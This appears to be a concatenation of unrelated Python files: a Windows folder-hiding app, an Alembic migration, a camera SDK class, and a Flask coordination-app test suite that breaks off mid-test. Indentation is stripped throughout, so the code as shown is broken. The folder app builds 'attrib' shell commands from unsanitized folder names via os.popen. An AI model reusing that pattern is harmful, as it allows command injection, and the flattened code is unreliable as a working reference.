tkinter.messagebox.showinfo("invalid directory", "invalid directory")
else:
break
with open("fldrlck.setting", "w") as g:
g.write(set_working_dir)
g.close()
root.deiconify()
f.close()
with open("fldrlck.setting", "r") as f:
data = f.read()
os.chdir(data)
f.close()
except:
exit(0)
set_working_directory()
def how_does_it_work():
tkinter.messagebox._show("how does it work?",
"this application does not 'encrypt' the folder, but rather makes it inaccessible by appending a CLSID to the folder name. without the specific CLSID used, your folder as as good as encrypted! ")
def author():
tkinter.messagebox._show("author",
"created by a person who HATES the modern panopticon, and believes in the right to privacy!")
def f_about():
tkinter.messagebox._show("about", "created to lock your folders. invasion of privacy no more!")
def instruction():
tkinter.messagebox.showinfo("how to use", "firstly, create a folder that you wish to lock, "
"either in this app or in file explorer. then, select it in the listbox and click the 'lock/unlock' button. this "
"will lock it, and to unlock simply press the button again.")
def encrypt_directory(directory):
try:
directory = str(directory).replace(" -- UNLOCKED", "")
except:
pass
try:
directory = str(directory).replace(" -- LOCKED", "")
except:
pass
if len(directory) != 0:
try:
global my_string
my_string = directory + ".{0010890e-8789-413c-adbc-48f5b511b3af}"
if not os.path.exists(directory):
if not os.path.exists(directory + ".{0010890e-8789-413c-adbc-48f5b511b3af}"):
os.mkdir(directory)
else:
os.popen("attrib -h " + my_string)
os.popen('attrib -h ' + directory)
os.rename(my_string, directory)
else:
os.rename(directory, my_string)
os.popen('attrib +h ' + my_string)
update_listbox()
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to lock your folder. ")
def remove_directory(directory):
if len(directory) != 0:
try:
if tkinter.messagebox.askyesno("rmdir", "remove directory? this action cannot be undone."):
rmtree(directory)
update_listbox()
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to delete this folder. this may be because the folder is locked.")
def update_current_working_directory():
working_directory_label.configure(text="cwd: " + os.getcwd())
def update_listbox():
try:
global data
list_of_folders = os.listdir(data)
#attempting to filter out system files, as os.path.isdir and isfile had a couple of bugs for me
system_files = ['$RECYCLE.BIN', 'System Volume Information', 'desktop.ini']
list_box.delete(0, END)
number_of_directories = []
number_of_verifies_directories = []
for item in list_of_folders:
if os.path.isdir(item):
number_of_directories.append(item)
for verified_dir in number_of_directories:
if verified_dir not in system_files:
number_of_verifies_directories.append(verified_dir)
#removing the CLSIDs from the folder name
for verified_real_dir in number_of_verifies_directories:
if verified_real_dir.endswith(".{0010890e-8789-413c-adbc-48f5b511b3af}"):
list_box.insert(END, verified_real_dir.replace(".{0010890e-8789-413c-adbc-48f5b511b3af}", " -- LOCKED"))
else:
list_box.insert(END, verified_real_dir + " -- UNLOCKED")
except:
pass
def make_directory(directory):
if len(directory) != 0:
try:
os.mkdir(directory)
update_listbox()
make_directory_entry.delete(0, END)
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to make your folder. this may be because the name is invalid.")
def logout():
clear_root()
root.geometry("250x127")
root.configure(bg='white')
startup()
my_menu = Menu(root)
root.config(menu=my_menu)
about_menu = Menu(my_menu, tearoff=False, font=("Ariel", 10))
settings_menu = Menu(my_menu, tearoff=False, font=("Ariel", 10))
my_menu.add_cascade(label='about', menu=about_menu, font=("Ariel", 10))
my_menu.add_cascade(label='settings', menu=settings_menu, font=("Ariel", 10))
settings_menu.add_command(label="change working directory", command=change_working_directory, font=("Ariel", 10))
settings_menu.add_command(label="change password", command=change_password, font=("Ariel", 10))
settings_menu.add_command(label="change username", command=change_username, font=("Ariel", 10))
settings_menu.add_command(label="logout", command=logout, font=("Ariel", 10))
settings_menu.add_separator()
settings_menu.add_command(label="exit", command=lambda: exit(0), font=("Ariel", 10))
about_menu.add_command(label='about', command=f_about, font=("Ariel", 10))
about_menu.add_command(label='methodology', command=how_does_it_work, font=("Ariel", 10))
about_menu.add_command(label="how to use", command=instruction, font=("Ariel", 10))
about_menu.add_command(label="about the author", command=author, font=("Ariel", 10))
list_box = Listbox(root, width=50)
list_box.grid(row=0, column=0)
update_listbox()
frame_for_button_and_entry = Frame(root, background="grey")
frame_for_button_and_entry.grid(row=1, column=0, columnspan=2, pady=5)
update_button = Button(frame_for_button_and_entry, text="update", width=5, command=update_listbox)
update_button.grid(row=0, column=0)
dir_to_make = StringVar
make_directory_entry = Entry(frame_for_button_and_entry, textvariable=dir_to_make, width=35)
make_directory_entry.grid(row=0, column=1, padx=15)
make_directory_button = Button(root, text="make directory", width=40, height=2, pady=5,
command=lambda: make_directory(make_directory_entry.get()))
make_directory_button.grid(row=2, column=0)
delete_directory_button = Button(root, text="remove directory", width=40, height=2, pady=5,
command=lambda: remove_directory(list_box.get(ANCHOR)))
delete_directory_button.grid(row=3, column=0)
encrypt_button = Button(root, text="lock/unlock directory", width=40, height=2, pady=5,
command=lambda: encrypt_directory(list_box.get(ANCHOR)))
encrypt_button.grid(row=4, column=0)
frame_for_label = Frame(root)
working_directory_label = Label(frame_for_label, text="CWD: " + os.getcwd(), background="grey")
frame_for_label.grid(row=5, column=0)
working_directory_label.grid(row=0, column=0)
def startup():
global USERPASSWORD, USERNAME
# ======================================================================
password_frame = Frame(root, pady=6, background="white")
username_frame = Frame(root, pady=6, background="white")
username_frame.pack()
password_frame.pack()
password_label = Label(password_frame, text="password: ", background="white")
password_label.grid(row=0, column=0)
entry_password = Entry(password_frame, show="•", bg="white")
entry_password.grid(row=0, column=1)
username_label = Label(username_frame, text="username: ", background="white")
username_label.grid(row=0, column=0)
entry_username = Entry(username_frame, bg="white")
entry_username.grid(row=0, column=1)
# ======================================================================
def enter():
try:
global password_variable, username_variable, username, password
password_variable = entry_password.get()
username_variable = entry_username.get()
if HASH(password_variable) == password and HASH(username_variable) == username:
incorrect_label.config(text="")
clear_root()
main()
else:
entry_username.delete(0, END)
entry_password.delete(0, END)
incorrect_label.config(text="incorrect password/username.")
except:
tkinter.messagebox.showinfo("error", "an error occurred when trying to verify your credentials. ")
enter_button = Button(root, text="verify", command=enter, bg="white", activebackground="white", width=20)
enter_button.pack()
incorrect_label = Label(root, text="", bg="white")
incorrect_label.pack()
if __name__ == '__main__':
if not system() == "Windows":
tkinter.messagebox.showerror("error", "This program only works on Windows machines.")
exit(0)
if not os.path.exists("fldrlck.setting"):
open("fldrlck.setting", "a+").close()
if keyring.get_password(FILENAME_USER, GENUSER) is None:
root.withdraw()
username_raw = tkinter.simpledialog.askstring("username", "please choose a username: ")
if username_raw:
username = HASH(username_raw)
keyring.set_password(FILENAME_USER, GENUSER, username)
root.deiconify()
else:
exit(0)
if keyring.get_password(FILENAME_PASS, GENUSER) is None:
root.withdraw()
password_raw = tkinter.simpledialog.askstring("password", "please choose a password: ", show="•")
if password_raw:
password = HASH(password_raw)
keyring.set_password(FILENAME_PASS, GENUSER, password)
root.deiconify()
else:
exit(0)
password = keyring.get_password(FILENAME_PASS, GENUSER)
username = keyring.get_password(FILENAME_USER, GENUSER)
startup()
root.mainloop()
|
"""create_game_table
Revision ID: 492408566602
Revises: 5a503b995cfd
Create Date: 2021-04-04 23:03:42.761266
"""
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "492408566602"
down_revision = "5a503b995cfd"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"game",
sa.Column("uuid", postgresql.UUID(), nullable=False),
sa.Column("date_created", sa.DateTime(), nullable=False),
sa.Column("player_created", postgresql.UUID(), nullable=False),
sa.ForeignKeyConstraint(
["player_created"],
["player.uuid"],
),
sa.PrimaryKeyConstraint("uuid"),
)
op.create_foreign_key(
"player_username_user_username_fk", "player", "user", ["username"], ["username"]
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint("player_username_user_username_fk", "player", type_="foreignkey")
op.drop_table("game")
# ### end Alembic commands ###
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .vimba_object import VimbaObject
from ctypes import c_void_p
# system features are automatically readable as attributes.
class VimbaSystem(VimbaObject):
"""
A Vimba system object. This class provides the minimal access
to Vimba functions required to control the system.
"""
# own handle is inherited as self._handle
def __init__(self):
super(VimbaSystem, self).__init__()
# set own handle manually
self._handle = c_void_p(1)
|
import os
import cohmo
from cohmo import app
import unittest
import tempfile
from unittest.mock import *
import time
from base64 import b64encode
from flask import json, jsonify
from cohmo.table import Table, TableStatus
from cohmo.history import HistoryManager
from cohmo.authentication_manager import AuthenticationManager
from cohmo.views import init_chief, init_authentication_manager
def generate_tempfile(content):
with tempfile.NamedTemporaryFile(delete=False) as t_file:
t_file.write(content.encode())
return t_file.name
class CohmoTestCase(unittest.TestCase):
def setUp(self):
cohmo.app.config['TEAMS_FILE_PATH'] = generate_tempfile('FRA,ITA,ENG,USA,CHN,IND,KOR,GER')
cohmo.app.config['HISTORY_FILE_PATH'] = generate_tempfile('USA,T2,5,10,ID1\n' + 'ENG,T5,8,12,ID2\n' + 'CHN,T5,13,17,ID3\n' + 'NLD,T3,16,29,ID4')
cohmo.app.config['TABLE_FILE_PATHS'] = {
'T2': generate_tempfile('''
{
"name": "T2",
"problem": "3",
"coordinators": ["Franco Anselmi", "Antonio Cannavaro"],
"queue": ["ITA", "ENG", "IND"],
"status": "BUSY"
}'''),
'T3': generate_tempfile('''
{
"name": "T3",
"problem": "4",
"coordinators": ["Pippo Pippino", "Topo Topoliino"],
"queue": ["GER", "FRA"],
"status": "VACANT"
}'''),
'T5': generate_tempfile('''
{
"name": "T5",
"problem": "6",
"coordinators": ["Alessandro Maschi", "Giovanni Muciaccia"],
"queue": ["KOR", "IND", "ENG", "USA"],
"status": "CALLING"
}'''),
'T8': generate_tempfile('''
{
"name": "T8",
"problem": "1",
"coordinators": ["Marco Faschi", "Giorgio Gigi"],
"queue": ["KOR", "ENG", "FRA"],
"status": "CORRECTING",
"current_coordination_team": "USA",
"current_coordination_start_time": 10
}'''),
}
cohmo.app.config['AUTHENTICATION_FILE_PATH'] = generate_tempfile('''
{
"admin": {
"password": "pass",
"authorizations": [],
"admin": true
},
"marco": {
"password": "xxx",
"authorizations": ["T2", "T5"]
}
}''')
cohmo.app.testing = True
credentials = b64encode(b'admin:pass').decode('utf-8')
self.headers = {'Authorization': 'Basic ' + credentials}
def tearDown(self):
os.unlink(cohmo.app.config['TEAMS_FILE_PATH'])
os.unlink(cohmo.app.config['HISTORY_FILE_PATH'])
for table in cohmo.app.config['TABLE_FILE_PATHS']:
os.unlink(cohmo.app.config['TABLE_FILE_PATHS'][table])
def test_chief_initialization(self):
chief = cohmo.get_chief()
self.assertTrue('T2' in chief.tables and 'T3' in chief.tables and 'T5' in chief.tables and 'T8' in chief.tables)
self.assertEqual(chief.teams, ['FRA', 'ITA', 'ENG', 'USA', 'CHN', 'IND', 'KOR', 'GER'])
self.assertEqual(chief.tables['T2'].status, TableStatus.BUSY)
self.assertEqual(chief.tables['T3'].status, TableStatus.VACANT)
self.assertEqual(chief.tables['T5'].status, TableStatus.CALLING)
self.assertEqual(chief.tables['T8'].status, TableStatus.CORRECTING)
self.assertEqual(chief.tables['T8'].current_coordination_team, 'USA')
self.assertEqual(chief.tables['T8'].current_coordination_start_time, 10)
self.assertEqual(len(chief.history_manager.corrections), 4)
def test_history(self):
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
self.assertTrue(history.add('ITA', 'T2', 10, 20))
self.assertTrue(history.add('FRA', 'T8', 20, 30))
self.assertTrue(history.add('KOR', 'T5', 15, 30))
self.assertFalse(history.delete('ID_NOT_EXISTENT'))
self.assertEqual(len(history.get_corrections({'identifier':'ID2'})), 1)
self.assertTrue(history.delete('ID2'))
self.assertEqual(history.get_corrections({'identifier':'ID2'}), [])
self.assertEqual(len(history.corrections), 6)
# Constructing HistoryManager from the file written by dump_to_file.
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
self.assertEqual(len(history.corrections), 6)
self.assertEqual(history.corrections[3].table, 'T2')
self.assertEqual(history.corrections[3].team, 'ITA')
self.assertTrue(history.add('ITA', 'T5', 20, 30))
# Testing various calls to get_corrections.
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
self.assertEqual(history.get_corrections({'table':'NOWAY'}), [])
self.assertEqual(len(history.get_corrections({'table':'T5'})), 3)
self.assertEqual(history.get_corrections({'identifier':'ID2'}), [])
self.assertEqual(len(history.get_corrections({'table':'T2'})), 2)
self.assertEqual(len(history.get_corrections({'table':'T3'})), 1)
self.assertEqual(len(history.get_corrections({'table':'T8'})), 1)
self.assertEqual(len(history.get_corrections({'table':'T5', 'team':'KOR'})), 1)
self.assertEqual(history.get_corrections({'table':'T5', 'team':'ROK'}), [])
self.assertEqual(len(history.get_corrections({'start_time':(-100,100)})), 7)
self.assertEqual(len(history.get_corrections({'end_time':(15,25)})), 2)
def test_table(self):
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
self.assertEqual(table.queue, ['ITA', 'ENG', 'IND'])
self.assertEqual(table.status, TableStatus.BUSY)
self.assertTrue(table.switch_to_calling())
self.assertEqual(table.status, TableStatus.CALLING)
self.assertTrue(table.switch_to_vacant())
self.assertFalse(table.switch_to_vacant())
self.assertEqual(table.status, TableStatus.VACANT)
self.assertTrue(table.switch_to_busy())
self.assertFalse(table.switch_to_busy())
self.assertEqual(table.status, TableStatus.BUSY)
self.assertTrue(table.start_coordination('IND'))
self.assertEqual(table.status, TableStatus.CORRECTING)
self.assertEqual(table.current_coordination_team, 'IND')
self.assertGreater(table.current_coordination_start_time, 100)
self.assertTrue(table.remove_from_queue('ENG'))
self.assertFalse(table.remove_from_queue('KOR'))
self.assertEqual(table.queue, ['ITA', 'IND'])
# Constructing Table from the file written by dump_to_file.
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
self.assertEqual(table.queue, ['ITA', 'IND'])
self.assertEqual(table.status, TableStatus.CORRECTING)
self.assertEqual(table.current_coordination_team, 'IND')
self.assertFalse(table.switch_to_calling())
self.assertFalse(table.switch_to_busy())
self.assertFalse(table.switch_to_vacant())
self.assertFalse(table.start_coordination('ITA'))
self.assertEqual(len(history.get_corrections({'table':'T2', 'team':'IND'})), 0)
self.assertTrue(table.finish_coordination())
self.assertEqual(table.status, TableStatus.VACANT)
self.assertEqual(len(history.get_corrections({'table':'T2', 'team':'IND'})), 1)
# Testing the queue modifying APIs.
self.assertTrue(table.add_to_queue('ENG'))
self.assertFalse(table.add_to_queue('ITA'))
self.assertTrue(table.add_to_queue('KOR', 0))
self.assertTrue(table.add_to_queue('CHN', 2))
self.assertEqual(table.queue, ['KOR', 'ITA', 'CHN', 'IND', 'ENG'])
self.assertFalse(table.remove_from_queue('FRA'))
self.assertTrue(table.remove_from_queue('ITA'))
self.assertFalse(table.remove_from_queue('ITA'))
self.assertFalse(table.swap_teams_in_queue('CHN', 'CHN'))
self.assertFalse(table.swap_teams_in_queue('FRA', 'KOR'))
self.assertTrue(table.swap_teams_in_queue('KOR', 'IND'))
self.assertEqual(table.queue, ['IND', 'CHN', 'KOR', 'ENG'])
# Testing operations_num.
def test_operations_num(self):
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
ops = history.operations_num
self.assertTrue(table.start_coordination('ITA'))
self.assertAlmostEqual(history.operations_num, ops+1)
self.assertTrue(table.finish_coordination())
self.assertAlmostEqual(history.operations_num, ops+2)
self.assertTrue(table.add_to_queue('CHN'))
self.assertAlmostEqual(history.operations_num, ops+3)
# Testing get_expected_duration.
mock_time = Mock()
mock_time.side_effect = [10123, 10, 3, 10, 4, 10, 2, 10, 11, 10, 10, 10, 10,
2, 10, 11, 10, 2, 10, 11, 10,
2, 10, 3, 10, 2, 10, 3, 10] # 10123 = history.operations_num
@patch('time.time', mock_time)
def test_get_expected_duration(self):
cohmo.app.config['NUM_SIGN_CORR'] = 2
cohmo.app.config['APRIORI_DURATION'] = 3
cohmo.app.config['MINIMUM_DURATION'] = 2
cohmo.app.config['MAXIMUM_DURATION'] = 8
cohmo.app.config['START_TIME'] = 0
tmp_maximum_time = cohmo.app.config['MAXIMUM_TIME']
cohmo.app.config['MAXIMUM_TIME'] = 25
cohmo.app.config['BREAK_TIMES'] = [[14, 16]]
history = HistoryManager(cohmo.app.config['HISTORY_FILE_PATH'])
table = Table(cohmo.app.config['TABLE_FILE_PATHS']['T2'], history, app.config)
# Testing the basic behaviour.
self.assertEqual(history.corrections[0].duration(), 5)
self.assertEqual(len(history.get_corrections({'table':'T2'})), 1)
self.assertAlmostEqual(table.get_expected_duration(), 4) # 10
self.assertTrue(table.start_coordination('ITA')) # 3, 10
self.assertAlmostEqual(table.get_expected_duration(), 4)
self.assertTrue(table.finish_coordination()) # 4, 10
self.assertAlmostEqual(table.get_expected_duration(), 3)
self.assertEqual(len(history.get_corrections({'table':'T2'})), 2)
# Testing the imposition on the maximum_time.
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 11, 10
self.assertAlmostEqual(table.get_expected_duration(), 13/3)
# Testing the case when the history is empty.
self.assertEqual(len(history.get_corrections({'table':'T2'})), 3)
corrections = history.get_corrections({'table':'T2'})
self.assertTrue(history.delete(corrections[0].id))
self.assertTrue(history.delete(corrections[1].id))
self.assertTrue(history.delete(corrections[2].id))
self.assertEqual(len(history.get_corrections({'table':'T2'})), 0)
# Recomputing the expected_duration and deleting almost all the queue.
table.compute_expected_duration() # 10
self.assertAlmostEqual(table.get_expected_duration(), 3)
self.assertTrue(table.remove_from_queue('ENG')) # 10
self.assertTrue(table.remove_from_queue('IND')) # 10
self.assertAlmostEqual(table.get_expected_duration(), 3)
# Testing the maximum_duration.
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 11, 10
self.assertAlmostEqual(table.get_expected_duration(), 6)
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 11, 10
self.assertAlmostEqual(table.get_expected_duration(), 8)
# Clearing the history again.
self.assertEqual(len(history.get_corrections({'table':'T2'})), 2)
corrections = history.get_corrections({'table':'T2'})
self.assertTrue(history.delete(corrections[0].id))
self.assertTrue(history.delete(corrections[1].id))
# Testing the minimum_duration.
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 3, 10
self.assertAlmostEqual(table.get_expected_duration(), 2)
self.assertTrue(table.start_coordination('ITA')) # 2, 10
self.assertTrue(table.finish_coordination()) # 3, 10
self.assertAlmostEqual(table.get_expected_duration(), 2)
cohmo.app.config['MAXIMUM_TIME'] = tmp_maximum_time
def test_authentication_manager(self):
authentication_manager = \
AuthenticationManager(cohmo.app.config['AUTHENTICATION_FILE_PATH'])
self.assertFalse(authentication_manager.verify_password('', ''))
self.assertFalse(authentication_manager.verify_password('x', 'y'))
self.assertFalse(authentication_manager.verify_password('marco', 'x'))
self.assertFalse(authentication_manager.verify_password('marco', 'pass'))
self.assertFalse(authentication_manager.verify_password('admin', 'xxx'))
self.assertTrue(authentication_manager.verify_password('marco', 'xxx'))
self.assertTrue(authentication_manager.verify_password('admin', 'pass'))
self.assertFalse(authentication_manager.is_authorized('T1', 'T2'))
self.assertFalse(authentication_manager.is_authorized('marco', 'T8'))
self.assertFalse(authentication_manager.is_authorized('marco', 'T111'))
self.assertTrue(authentication_manager.is_authorized('marco', 'T5'))
self.assertTrue(authentication_manager.is_authorized('marco', 'T2'))
self.assertTrue(authentication_manager.is_authorized('admin', 'T2'))
self.assertTrue(authentication_manager.is_authorized('admin', 'T5'))
self.assertFalse(authentication_manager.is_admin('XXX'))
self.assertFalse(authentication_manager.is_admin('marco'))
self.assertTrue(authentication_manager.is_admin('admin'))
def test_views_table_queue_modifications(self):
cohmo.views.init_chief()
cohmo.views.init_authentication_manager()
client = cohmo.app.test_client()
headers = self.headers
# Testing add_to_queue.
resp = json.loads(client.post('/table/T1/add_to_queue', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'ENG'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team ENG is already in queue at table T2.')
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND', 'CHN'])
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'FRA', 'pos': 2})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'FRA', 'IND', 'CHN'])
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'FRA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND', 'CHN'])
# Testing remove_from_queue.
resp = json.loads(client.post('/table/T1/remove_from_queue', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'KOR'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team KOR is not in queue at table T2.')
resp = json.loads(client.post('/table/T2/remove_from_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ITA', 'ENG', 'IND'])
# Testing swap_teams_in_queue.
resp = json.loads(client.post('/table/T1/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['ITA', 'ENG']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'pippo': ['USA']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify the teams to be swapped.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['VAT']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to give exactly two teams to be swapped.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['VAT', 'ENG']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['ITA', 'KOR']})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team KOR is not in queue at table T2.')
resp = json.loads(client.post('/table/T2/swap_teams_in_queue', headers=headers,
data=json.dumps({'teams': ['ENG', 'ITA']})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ENG', 'ITA', 'IND'])
def test_views_table_coordination_management(self):
cohmo.app.config['SKIPPED_POSITIONS'] = 1
cohmo.views.init_chief()
cohmo.views.init_authentication_manager()
client = cohmo.app.test_client()
headers = self.headers
# Testing start_coordination.
resp = json.loads(client.post('/table/T1/start_coordination', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team VAT does not exist.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'KOR'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Team KOR is not in queue at table T2.')
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'ITA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ENG', 'IND'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 1)
# Testing finish_coordination.
resp = json.loads(client.post('/table/T1/finish_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/finish_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['ENG', 'IND'])
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 3)
resp = json.loads(client.post('/table/T2/finish_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False)
# Testing pause_coordination.
resp = json.loads(client.post('/table/T2/add_to_queue', headers=headers,
data=json.dumps({'team': 'CHN'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.post('/table/T2/start_coordination', headers=headers,
data=json.dumps({'team': 'ENG'})).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN'])
resp = json.loads(client.post('/table/T1/pause_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/pause_coordination', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing switch_to_calling.
resp = json.loads(client.post('/table/T1/switch_to_calling', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/switch_to_calling', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 0)
# Testing switch_to_vacant.
resp = json.loads(client.post('/table/T1/switch_to_vacant', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/switch_to_vacant', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 3)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing switch_to_busy.
resp = json.loads(client.post('/table/T1/switch_to_busy', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/switch_to_busy', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == True)
resp = json.loads(client.get('/table/T2/get_all').data)
self.assertTrue('ok' in resp and 'table_data' in resp)
table_data = json.loads(resp['table_data'])
self.assertEqual(table_data['status'], 2)
resp = json.loads(client.get('/table/T2/get_queue').data)
self.assertTrue('ok' in resp)
self.assertEqual(resp['queue'], ['IND', 'CHN', 'ENG'])
# Testing call_team
resp = json.loads(client.post('/table/T1/call_team', headers=headers).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'Table T1 does not exist.')
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'pippo': 'USA'})).data)
self.assertTrue('ok' in resp and resp['ok'] == False and
resp['message'] == 'You have to specify a team.')
resp = json.loads(client.post('/table/T2/call_team', headers=headers,
data=json.dumps({'team': 'VAT'})).data)
